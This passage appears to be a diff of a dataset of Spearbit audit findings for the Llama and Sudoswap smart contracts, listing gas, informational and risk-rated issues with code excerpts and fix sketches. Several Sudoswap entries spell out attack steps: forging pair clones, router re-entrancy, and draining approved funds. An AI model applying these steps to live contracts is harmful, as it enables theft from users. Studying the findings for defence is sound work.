CallReverted and MissingAdmin in LlamaPolicy.sol#L27-L29 DisapprovalThresholdNotMet in RelativeStrategy.sol#L28 Unused errors in LlamaCore.sol: InvalidCancelation, ProhibitedByActionGuard, ProhibitedByStrategy, ProhibitedByStrategy(bytes32 reason) and RoleHasZeroSupply(uint8 role) /// - Action creators are not allowed to cast approvals or disapprovals on their own actions, The comment is inaccurate; in this strategy, the creators have no restrictions on their actions. RelativeStrategy.sol#L19", "labels": [ "Spearbit", "Llama", "Severity: Gas Optimization" ] }, { "title": "Duplicate storage reads and external calls", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "When creating, approving, disapproving, queuing, and executing actions, there are calls between the various contracts in the system. Due to the external calls, the compiler will not cache storage reads, meaning the gas cost of warm sloads is incurred multiple times. The same is true for view function calls between the contracts. A number of these calls are returning the same value multiple times in a transaction.", "labels": [ "Spearbit", "Llama", "Severity: Gas Optimization" ] }, { "title": "Consider clones-with-immutable-args", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "The cloned contracts have immutable values that are written to storage on initialization due to proxies being used. Reading from storage costs extra gas but also puts some of the storage values at risk of being overwritten when making delegate calls.", "labels": [ "Spearbit", "Llama", "Severity: Gas Optimization" ] }, { "title": "The domainSeperator may be cached", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "The domainSeperator is computed for each use. Some gas may be saved by caching it and deferring to the cached value.", "labels": [ "Spearbit", "Llama", "Severity: Gas Optimization" ] }, { "title": "Prefer on-chain SVGs or IPFS links over server links for contractURI", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Llama uses on-chain SVG for LlamaPolicy.tokenURI. The same could be implemented for LlamaPolicy.contractURI as well. 
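A minimal sketch of an on-chain variant (metadata fields illustrative; Base64 as in e.g. OpenZeppelin's library):
// Hypothetical contractURI mirroring the on-chain approach used for tokenURI:
function contractURI() external view returns (string memory) {
    string memory json = string.concat('{\"name\":\"', name, '\",\"description\":\"Llama policies\"}');
    return string.concat(\"data:application/json;base64,\", Base64.encode(bytes(json)));
}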
In general, IPFS links or on-chain SVG for visual representations provide better properties than centralized server links.", "labels": [ "Spearbit", "Llama", "Severity: Informational" ] }, { "title": "Consider making the delegate-call scripts' functions only callable by delegate-call", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "An additional safety check could be added to scripts if a function should be only callable via a delegate-call.", "labels": [ "Spearbit", "Llama", "Severity: Informational" ] }, { "title": "Missing tests for SingleUseScript.sol", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "There are no tests for SingleUseScript.sol in Llama.", "labels": [ "Spearbit", "Llama", "Severity: Informational" ] }, { "title": "Role not available to Guards", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Use cases where Guards require knowing the creation or approval role for the action are not supported. ActionInfo does reference the strategy, and the two implemented strategies do have public functions referencing the approvalRole, allowing for a workaround. 
However, this is not mandated by the ILlamaStrategy interface and is not guaranteed to be present in future strategies.", "labels": [ "Spearbit", - "Sudoswap", + "Llama", "Severity: Informational" ] }, { - "title": "Inaccurate Message About MAX_FEE", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The function initialize() of LSSVMPair has an error message containing less than 100%. This is likely an error and should probably be less than 90%, as in the changeFee() function and because MAX_FEE == 90%. 41 // 90%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 9e17; function initialize(..., uint256 _fee, ...) external payable { ... require(_fee < MAX_FEE, \"Trade fee must be less than 100%\"); // 100% should be 90% ... ,! } function changeFee(uint256 newFee) external onlyOwner { ... require(newFee < MAX_FEE, \"Trade fee must be less than 90%\"); ... }", + "title": "Global guards are not supported", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Other protocols' use of guards applies them to the account (i.e. globally). In other words, if global guards existed and if there are some properties you know to apply to the entire LlamaCore instance, a global guard could be applied. The current implementation allows granular control, but it also requires granular control, with no ability to set global guards.", "labels": [ "Spearbit", - "Sudoswap", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Consider using _disableInitializers in constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "OpenZeppelin added the _disableInitializers() in 4.6.0, which prevents initialization of the implementation contract, and recommends its use.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Revoking and setting a role edge cases", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "This issue highlights a number of edge-case behaviors: 1. Calling setRoleHolder passing in an account with balanceOf == 0, 0 quantity, and 0 expiration results in minting the NFT. 2. Revoking all policies through revokeExpiredRole leaves an address with no roles except for the ALL_HOLDERS_ROLE and a balanceOf == 1. 3. Revoking may be conducted on policies the address does not have (building on the previous scenario): Alice is given role 1 with expiry. Expiry passes. Anyone calls revokeExpiredRole. Role is revoked but Alice still has balanceOf == 1. LlamaCore later calls revokePolicy with roles array of [2]. A role Alice never had is revoked. The NFT is burned.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Use built in string.concat", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The Solidity version used has a built-in string.concat which can replace the instances of string(abi.encodePacked(...)). 
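A minimal sketch of the replacement; identifiers are illustrative:

pragma solidity ^0.8.12;

contract ConcatSketch {
    // Before: concatenation via abi.encodePacked, then a cast back to string.
    function viaEncodePacked(string memory a, string memory b) external pure returns (string memory) {
        return string(abi.encodePacked(a, b));
    }

    // After: the built-in string.concat (Solidity >= 0.8.12) reads as plain concatenation.
    function viaConcat(string memory a, string memory b) external pure returns (string memory) {
        return string.concat(a, b);
    }
}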
The client notes there are no gas implications of this change while the change does offer semantic clarity.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Inconsistencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Throughout the codebase, we've encountered some inconsistencies that we decided to point out. for(uint256 i = 0... is not used everywhere, e.g. AbsoluteStrategy.sol#L130 Sometimes, a returned value is not named. e.g. named return value function createAction( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, string memory description ) external returns (uint256 actionId) { unnamed return value function createActionBySig( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, address policyholder, uint8 v, bytes32 r, bytes32 s ) external returns (uint256) { Missing NatSpec on various functions, e.g. LlamaPolicy.sol#L102 _uncheckedIncrement is not used everywhere. Naming of modifiers In all contracts the onlyLlama modifier only refers to the llamaCore. The only exception is LlamaPolicyMetadataParamRegistry, which has a modifier with the same name that refers to llamaCore and rootLlama but is still called onlyLlama. See LlamaPolicyMetadataParamRegistry.sol#L16 Console.log debug output in RelativeStrategy. See: RelativeStrategy.sol#L215 In GovernanceScript.sol both of SetRolePermission and SetRoleHolder mirror structs defined in the shared lib/Structs.sol file. Additionally, some contracts declare their own structs over inheriting all structs from lib/Structs.sol: LlamaAccount GovernanceScript LlamaPolicy Recommend removing duplicate structs and, where relevant, continue making use of the shared Structs.sol for struct definitions.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Policyholders with large quantities may not both create and exercise their large quantity for the same action", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The AbsoluteStrategy removes the action creator from the set of policyholders who may approve / disapprove an action. This is a departure from how the RelativeStrategy handles action creators. Not permitting action creators to approve / disapprove is simple to reason about when each policyholder has a quantity of 1; creating can even be thought of as an implicit approval and may be factored in when choosing a minApprovals value. However, in scenarios where a policyholder has a large quantity (in effect a large weight to their casted approval), creating an action means they forfeit the use of the vast majority of their quantity for that particular action.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "The roleBalanceCheckpoints can run out of gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The roleBalanceCheckpoints function returns the Checkpoints history of a balance. This call will copy the whole history into memory, which can end up in an out-of-gas error. 
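If on-chain consumption were ever required, a paginated getter could bound the copy. A sketch only; the Checkpoint struct and _checkpoints layout below are assumed for illustration, not Llama's actual storage:

pragma solidity ^0.8.0;

contract CheckpointPagingSketch {
    struct Checkpoint { uint64 timestamp; uint192 quantity; } // assumed shape

    mapping(address => mapping(uint8 => Checkpoint[])) internal _checkpoints; // assumed layout

    // Returns at most `count` checkpoints starting at index `start`, bounding memory use.
    function roleBalanceCheckpointsPaged(address policyholder, uint8 role, uint256 start, uint256 count)
        external view returns (Checkpoint[] memory page)
    {
        Checkpoint[] storage history = _checkpoints[policyholder][role];
        uint256 end = start + count;
        if (end > history.length) end = history.length;
        page = new Checkpoint[](end > start ? end - start : 0);
        for (uint256 i = 0; i < page.length; i++) {
            page[i] = history[start + i];
        }
    }
}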
This is an informational issue as this function was designed for off-chain usage and the caller can use eth_call with a higher gas limit.", + "labels": [ + "Spearbit", + "Llama", "Severity: Informational" ] }, { - "title": "Inaccurate comment for assetRecipientNFTBalanceAtTransferStart", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The comment in LSSVMPair notes that assetRecipientNFTBal- anceAtTransferStart is 0; however, in routerSwapNFTsForToken() the variable assetRecipientNFTBalanceAtTransferStart is set to 1. As such, the below comment is probably inaccurate. // Temporarily used during LSSVMRouter::_swapNFTsForToken to store the number of NFTs transferred ,! // directly to the pair. Should be 0 outside of the execution of routerSwapAnyNFTsForToken. ,! uint256 internal `assetRecipientNFTBalanceAtTransferStart`; function routerSwapNFTsForToken(address payable tokenRecipient) ... { ... assetRecipientNFTBalanceAtTransferStart = 1; ... } 42", + "title": "GovernanceScript.revokeExpiredRoles should be avoided in favor of calling LlamaPolicy.revokeExpiredRole from EOA", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "GovernanceScript.revokeExpiredRoles is intended to be delegate-called from LlamaCore. Given that LlamaPolicy.revokeExpiredRole is already public and without access controls, it will always be cheaper, and less complex, to call it directly from an EOA or to batch a multicall, again from an EOA.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "The InvalidActionState can be improved", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Currently, the InvalidActionState includes the expected state as an argument; this is unnecessary, as you can derive the expected state from the method call. It would make more sense to take the current state instead of the expected state.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "_uncheckedIncrement function written in multiple contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Multiple contracts make use of an _uncheckedIncrement function and each duplicates the function definition. Similarly the slot0 function appears in both LlamaAccount and LlamaCore and _toUint64 appears in the two strategy contracts plus LlamaCore.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Clones with malicious extradata are also considered valid clones", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Spearbit discovered that the functions verifying if a contract is a pair do so by only checking the first 54 bytes (i.e. the Proxy code). An attacker could deploy a contract that starts with the first 54 bytes of proxy code but has a malicious payload, and these functions will still verify it as a legitimate clone. We have found this to be a critical issue based on the feasibility of a potential exploit. Consider the following scenario: 1. An attacker creates a malicious pair by making a copy of the source of cloneETHPair() supplying malicious values for factory, bondingCurve, nft and poolType using a valid template for the connected contract. 2. 
The attacker has a contract with valid proxy code, connected to a valid template, but the rest of the parameters are invalid. 3. The Pair is initialized via a copy of initialize() of LSSVMPair, which calls __Ownable_init() to set a malicious owner. 4. The malicious owner calls call(), with target equal to the router contract and the calldata for the function pairTransferERC20From(): // Owner is set by pair creator function call(address payable target, bytes calldata data) external onlyOwner { // Factory is malicious LSSVMPairFactoryLike _factory = factory(); // `callAllowed()` is malicious and returns true require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result, ) = target.call{value: 0}(data); require(result, \"Call failed\"); } 5. The check for onlyOwner and require pass, therefore pairTransferERC20From() is called with the malicious Pair as msg.sender. 6. The router checks if it is called from a valid pair via isPair(): function pairTransferERC20From(...) external { // Verify caller is a trusted pair contract // The malicious pair passed this test require(factory.isPair(msg.sender, variant), \"Not pair\"); ... token.safeTransferFrom(from, to, amount); } 7. Because the function isPair() only checks the first 54 bytes (the runtime code including the implementation address), isPair() does not check for extra parameters factory, bondingCurve, nft or poolType: function isPair(address potentialPair, PairVariant variant) ... { ... } else if (variant == PairVariant.ENUMERABLE_ETH) { return LSSVMPairCloner.isETHPairClone(address(enumerableETHTemplate),potentialPair); } ... } function isETHPairClone(address implementation, address query) ... { ... // Compare expected bytecode with that of the queried contract let other := add(ptr, 0x40) extcodecopy(query, other, 0, 0x36) result := and( eq(mload(ptr), mload(other)), // Checks 32 + 22 = 54 bytes eq(mload(add(ptr, 0x16)), mload(add(other, 0x16))) ) } 8. Now the malicious pair is considered valid, the require statement in pairTransferERC20From() has passed and tokens can be transferred to the attacker from anyone who has set an allowance for the router.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Critical Risk" + ] + }, + { + "title": "Factory Owner can steal user funds approved to the Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "A pair owner can make arbitrary calls to any contract that has been approved by the factory owner. The code in the factory intends to prevent router contracts from being approved for calls because router contracts can have access to user funds. An example includes the pairTransferERC20From() function, which can be used to steal funds from any account which has given it approval. The router contracts can nevertheless be whitelisted by first being removed as a router and then being whitelisted. This way anyone can deploy a pair and use the call function to steal user funds.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: High Risk" + ] + }, + { + "title": "Missing check in the number of Received Tokens when tokens are transferred directly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Within the function _validateTokenInput() of LSSVMPairERC20, two methods exist to transfer tokens. In the first method, via router.pairTransferERC20From(), a check is performed on the number of received tokens. 
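The same balance check could be mirrored in the direct-transfer branch discussed next. A sketch only, reusing the finding's own names and check:

pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract DirectTransferCheckSketch {
    using SafeERC20 for IERC20;

    // Mirrors the router-branch check for the direct branch of _validateTokenInput().
    function pullExact(IERC20 token, address assetRecipient, uint256 inputAmount) internal {
        uint256 beforeBalance = token.balanceOf(assetRecipient);
        token.safeTransferFrom(msg.sender, assetRecipient, inputAmount);
        require(
            token.balanceOf(assetRecipient) - beforeBalance == inputAmount,
            "ERC20 not transferred in"
        );
    }
}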
In the second method no checks are done. Recent hacks (e.g. Qubit Finance) have successfully exploited safeTransferFrom() functions which did not revert nor transfer tokens. Additionally, with malicious or re-balancing tokens the number of transferred tokens might be different from the amount requested to be transferred. function _validateTokenInput(...) ... { ... if (isRouter) { ... // Call router to transfer tokens from user uint256 beforeBalance = _token.balanceOf(_assetRecipient); router.pairTransferERC20From(...); // Verify token transfer (protect pair against malicious router) require( _token.balanceOf(_assetRecipient) - beforeBalance == inputAmount, \"ERC20 not transferred in\"); } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Malicious assetRecipient could get an unfair amount of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The function _swapNFTsForToken() of LSSVMRouter calls safeTransferFrom(), which then calls onERC721Received of assetRecipient. A malicious assetRecipient could manipulate its NFT balance by buying additional NFTs via the Pair and sending or selling them back to the Pair, enabling the malicious actor to obtain an unfair amount of tokens via routerSwapNFTsForToken(). function _swapNFTsForToken(...) ... { ... swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // call to onERC721Received of assetRecipient } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); // checks the token balance of assetRecipient } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Malicious Router can exploit cacheAssetRecipientNFTBalance to drain pair funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "A malicious router could be whitelisted by an inattentive or a malicious factory owner and drain pair funds in the following exploit scenario: 1. Call the cache function. Suppose that the current balance is 10, so it gets cached. 2. Sell 5 NFTs to the pair and get paid using swapNFTsForToken. Total balance is now 15 but the cached balance is still 10. 3. Call routerSwapNFTsForToken. This function will compute total_balance - cached_balance, assume 5 NFTs have been sent to it and pay the user. However, no new NFTs have been sent and it already paid for them in Step 2.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Malicious Router can steal NFTs via Re-Entrancy attack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "If the factory owner approves a malicious _router, it is possible for the malicious router to call functions like swapTokenForAnyNFTs() and set isRouter to true. Once that function reaches router.pairTransferERC20From() in _validateTokenInput(), they can re-enter the pair from the router and call swapTokenForAnyNFTs() again. 
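A sketch of the guard this finding implies; LSSVMPair already inherits ReentrancyGuard elsewhere in the codebase, so the change is mainly applying nonReentrant to the swap entry points. Names below are illustrative:

pragma solidity ^0.8.0;

import {ReentrancyGuard} from "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract GuardedSwapSketch is ReentrancyGuard {
    // The reentrant call made from the malicious router would hit the
    // nonReentrant lock and revert instead of receiving a second NFT payout.
    function swapTokenForAnyNFTs(uint256 numNFTs) external payable nonReentrant returns (uint256) {
        // ... pull payment, then send NFTs (elided in this sketch) ...
        return numNFTs;
    }
}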
This second time the function reaches router.pairTransferERC20From(), allowing the malicious router to execute a token transfer so that the require of _validateTokenInput is satisfied when the context returns to the pair. When the context returns from the reentrant call back to the original call, the require of _validateTokenInput would still pass because the balance was cached before the reentrant call. Therefore, an attacker will receive 2 NFTs by sending tokens only once.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "getAllHeldIds() of LSSVMPairMissingEnumerable is vulnerable to a denial of service attack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPairMissingEnumerable tries to compensate for NFT contracts that do not have ERC721Enumerable implemented. However, this cannot be done for everything as it is possible to use transferFrom() to send an NFT from the same collection to the Pair. In that case the callback onERC721Received() will not be triggered and the idSet administration of LSSVMPairMissingEnumerable will not be updated. This means that nft().balanceOf(address(this)) can be different from the elements in idSet. Assuming an actor accidentally, or on purpose, uses transferFrom() to send additional NFTs to the Pair, getAllHeldIds() will fail as idSet.at(i) for unregistered NFTs will fail. This can be used in a griefing attack. getAllHeldIds() in LSSVMPairMissingEnumerable: function getAllHeldIds() external view override returns (uint256[] memory) { uint256 numNFTs = nft().balanceOf(address(this)); // returns the registered + unregistered NFTs uint256[] memory ids = new uint256[](numNFTs); for (uint256 i; i < numNFTs; i++) { ids[i] = idSet.at(i); // will fail at the unregistered NFTs } return ids; } The following checks performed with _nft.balanceOf() might not be accurate in combination with LSSVMPairMissingEnumerable. Risk is low because, with any additional NFTs, later calls to _sendAnyNFTsToRecipient() and _sendSpecificNFTsToRecipient() will fail. However, this might make it more difficult to troubleshoot issues. function swapTokenForAnyNFTs(...) ... { ... require((numNFTs > 0) && (numNFTs <= _nft.balanceOf(address(this))),\"Ask for > 0 and <= balanceOf NFTs\"); ... _sendAnyNFTsToRecipient(_nft, nftRecipient, numNFTs); // could fail ... } function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),\"Must ask for > 0 and < balanceOf NFTs\"); // '<' should be '<=' ... _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); // could fail ... } Note: The error string < balanceOf NFTs is not accurate.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "With NFT pools the protocol fees end up in assetRecipient instead of _factory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Assume a scenario where an NFT pool with assetRecipient set has the received funds sent directly to the assetRecipient. Now, suppose a user executes the swapTokenForSpecificNFTs(). The function _validateTokenInput() sends the required input funds, including fees, to the assetRecipient. The function _payProtocolFee() tries to send the fees to the _factory. However, this function attempts to do so from the pair contract. 
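One possible shape of a fix, sketched with the finding's names: take the protocol fee out of the incoming amount before forwarding the rest to the assetRecipient, so the fee never depends on the pair's own balance. This is an illustration, not the project's actual remediation:

pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract FeeSplitSketch {
    using SafeERC20 for IERC20;

    // Hypothetical: split the input between assetRecipient and the factory in one step.
    function pullWithFee(IERC20 token, address assetRecipient, address factory, uint256 inputAmount, uint256 protocolFee) internal {
        token.safeTransferFrom(msg.sender, assetRecipient, inputAmount - protocolFee);
        token.safeTransferFrom(msg.sender, factory, protocolFee);
    }
}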
The pair contract does not have any funds because they have been sent directly to the assetRecipient. So, following this action, _payProtocolFee() lowers the fees to 0 and sends this amount to the _factory; the fees thus end up at the assetRecipient instead of at the _factory. Note: The same issue occurs in swapTokenForAnyNFTs(). This issue occurs with both ETH and ERC20 NFT Pools, although their logic is slightly different. This issue occurs both when swapTokenForSpecificNFTs() is called directly as well as indirectly via the LSSVMRouter. Although the pool fees are 0 with NFT pools, the factory fee is still present. Luckily, TRADE pools cannot have an assetRecipient as this would also create issues. abstract contract LSSVMPair is Ownable, ReentrancyGuard { ... function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); // sends inputAmount to assetRecipient _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); _refundTokenToSender(inputAmount); _payProtocolFee(_factory, protocolFee); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { ... function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ... uint256 pairTokenBalance = _token.balanceOf(address(this)); if (protocolFee > pairTokenBalance) { protocolFee = pairTokenBalance; } _token.safeTransfer(address(_factory), protocolFee); // tries to send from the Pair contract } } abstract contract LSSVMPairETH is LSSVMPair { function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ... uint256 pairETHBalance = address(this).balance; if (protocolFee > pairETHBalance) { protocolFee = pairETHBalance; } payable(address(_factory)).safeTransferETH(protocolFee); // tries to send from the Pair contract } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Error codes of Quote functions are unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The error return values from functions getBuyNFTQuote() and getSellNFTQuote() are not checked in contract LSSVMRouter.sol, whereas other functions in contract LSSVMPair.sol do check for error==CurveErrorCodes.Error.OK. abstract contract LSSVMPair is Ownable, ReentrancyGuard { ... function getBuyNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getSellInfo(...); } function swapTokenForAnyNFTs(...) external payable virtual returns (uint256 inputAmount) { ... (error, ...) = _bondingCurve.getBuyInfo(...); require(error == CurveErrorCodes.Error.OK, \"Bonding curve error\"); ... } } LSSVMRouter.sol#L526 (, , pairOutput, ) = swapList[i].pair.getSellNFTQuote(...); The following contract lines contain the same code snippet below: LSSVMRouter.sol#L360, LSSVMRouter.sol#L407, LSSVMRouter.sol#L450, LSSVMRouter.sol#L493, LSSVMRouter.sol#L627, LSSVMRouter.sol#L664 (, , pairCost, ) = swapList[i].pair.getBuyNFTQuote(...); Note: The current Curve contracts, which implement the getBuyNFTQuote() and getSellNFTQuote() functions, have a limited number of potential errors. 
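Checking the returned code in the router would mirror the pair's own handling. A self-contained sketch using the quoted call shape; the enum values are taken from the snippets above, everything else is illustrative:

pragma solidity ^0.8.0;

library CurveErrorCodes {
    enum Error { OK, INVALID_NUMITEMS }
}

interface IPairQuote {
    function getBuyNFTQuote(uint256 numNFTs)
        external view
        returns (CurveErrorCodes.Error error, uint256 newSpotPrice, uint256 inputAmount, uint256 protocolFee);
}

contract QuoteCheckSketch {
    // Bubble the curve error up instead of silently discarding the error slot.
    function checkedBuyQuote(IPairQuote pair, uint256 numNFTs) internal view returns (uint256 pairCost) {
        (CurveErrorCodes.Error error, , uint256 cost, ) = pair.getBuyNFTQuote(numNFTs);
        require(error == CurveErrorCodes.Error.OK, "Bonding curve error");
        return cost;
    }
}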
However, future Curve contracts might add additional error codes.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Swaps can be front run by Pair Owner to extract any profit from slippage allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "If the user adds a nonzero slippage allowance, the pair owner can front run the swap to increase the fee/spot price and steal all of the slippage allowance. This basically makes sandwich attacks much easier and cheaper to execute for the pair owner.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Add check for numItems == 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions getBuyInfo() and getSellInfo() in LinearCurve.sol check that numItems != 0. However, the same getBuyInfo() and getSellInfo() functions in ExponentialCurve.sol do not perform this check. contract LinearCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // We only calculate changes for buying 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } function getSellInfo(...) ... { // We only calculate changes for selling 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } } contract ExponentialCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // No check on `numItems` uint256 deltaPowN = delta.fpow(numItems, FixedPointMathLib.WAD); ... } function getSellInfo(...) ... { // No check on `numItems` uint256 invDelta = FixedPointMathLib.WAD.fdiv(delta,FixedPointMathLib.WAD); ... } } If the code remains unchanged, an erroneous situation may not be caught and funds might be sent when selling 0 NFTs. Luckily, when numItems == 0 the resulting outputValue of the functions in ExponentialCurve is still 0, so there is no real issue. However, it is still important to fix this because a derived version of these functions might be used by future developers.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Disallow arbitrary function calls to LSSVMPairETH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPairETH contains an open fallback() function. The fallback() is most likely necessary because the proxy adds calldata, so the receive() function does not receive the ETH. However, without additional checks any function call to an ETH Pair will succeed. This could result in unforeseen scenarios which hackers could potentially exploit. fallback() external payable { emit TokenDeposited(msg.value); }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Only transfer relevant funds for PoolType", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The functions _initializePairETH() and _initializePairERC20() allow for the transfer of ETH/ERC20 and NFTs even when this is not relevant for the PoolType. Although funds can be rescued from the Pair, it is perhaps better to prevent these types of mistakes. function _initializePairETH(...) ... { ... // Transfer initial `ETH` to `pair` // Only relevant for `PoolType.TOKEN` or `PoolType.TRADE` payable(address(_pair)).safeTransferETH(msg.value); ... 
